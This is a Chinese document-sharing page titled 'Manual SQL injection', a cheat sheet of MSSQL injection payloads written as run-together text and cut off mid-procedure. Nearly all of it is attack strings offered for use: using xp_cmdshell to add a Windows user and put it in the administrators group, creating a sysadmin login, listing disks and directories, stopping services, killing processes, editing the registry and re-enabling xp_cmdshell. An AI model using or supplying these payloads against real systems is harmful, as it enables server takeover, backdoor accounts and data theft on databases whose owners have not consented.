资源描述:
《手工注入SQL》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库。
1、--是否存在xp_cmdshelland1=(selectcount(*)frommaster.dbo.sysobjectswherextype='x'andname='xp_cmdshell')--用xp_cmdshell执行命令;execmaster..xp_cmdshell"netusernamepassword/add"--;execmaster..xp_cmdshell"netlocalgroupnameadministrators/add"----查看权限and(selectIS_SRVR
2、OLEMEMBER('sysadmin'))=1-- //saand(selectIS_MEMBER('db_owner'))=1-- // dboand(selectIS_MEMBER('public'))=1-- //public--创建个登陆mssql的帐号;execmaster.dbo.sp_addloginname,pass;----把创建的mssql登陆帐号提升到sysadmin;execmaster.dbo.sp_addsrvrolemembername,sysadmin;--有
3、用的扩展--获得MSSQL的版本号 //mssql版本executemaster..sp_msgetversion //dbopublic--得到硬盘文件信息 //dbopublic--参数说明:目录名,目录深度,是否显示文件//读取磁盘目录和文件executemaster..xp_dirtree'c:'//列出所有c:文件和目录,子目录executemaster..xp_dirtree'c:',1//只列c:文件夹executemaster..xp_dirtree'c:
4、',1,1//列c:文件夹加文件--列出服务器上所有windows本地组executemaster..xp_enumgroups//dbo--得到当前sqlserver服务器的计算机名称//获得计算机名 executemaster..xp_getnetname //dbopublic--列出指定目录的所有下一级子目录EXEC[master].[dbo].[xp_subdirs]'c:WINNT'//可以列目录--列出服务器上固定驱动器,以及每个驱动器的可用空间executemaster..xp
5、_fixeddrives //dbopublic--显示系统上可用的盘符executemaster..xp_availablemedia //dbo--获取某文件的相关属性executemaster..xp_getfiledetails'C:1.txt' //dbopublic--统计数据库里每个表的详细情况execsp_MSforeachtable'sp_spaceused''?'''//查询表//dbopublic--获得每个表的记录数和容量execsp_MSforeachtable'sel
6、ect''?''','?','sp_spaceused''?''','SELECTcount(*)FROM?' //dbopubilc--更新Table1/Table2中note列为NULL的值sp_MSforeachtable'Update?Setnote=''''Wherenoteisnull',null,null,null,'ANDo.namein(''Table1'',''Table2'')--列出服务器域名xp_ntsec_enumdomains//机器名//dbopublic--停止或者
7、启动某个服务xp_servicecontrol'stop','schedule'//schedule是服务得名称 //dbo--用pid来停止某个执行中的程序xp_terminate_process123//123是pid//dbo--只列某个目录下的子目录dbo.xp_subdirs'C:'//dbo--服务器安全模式信息xp_loginconfig //dboxp_regaddmultistringxp_regdeletekeyxp_regdeletevaluexp_regenumkeysxp
8、_regenumvaluesxp_regreadxp_regremovemultistringxp_regwrite--将新扩展存储过程的名称注册到Microsoft?SQLServer?上。sp_addextendedprocxp_cmdshell,@dllname='xplog70.dll'//恢复xp_cmdshell恢复过程sp_addextendedproc如下:createproceduresp_addextendedproc---1996/
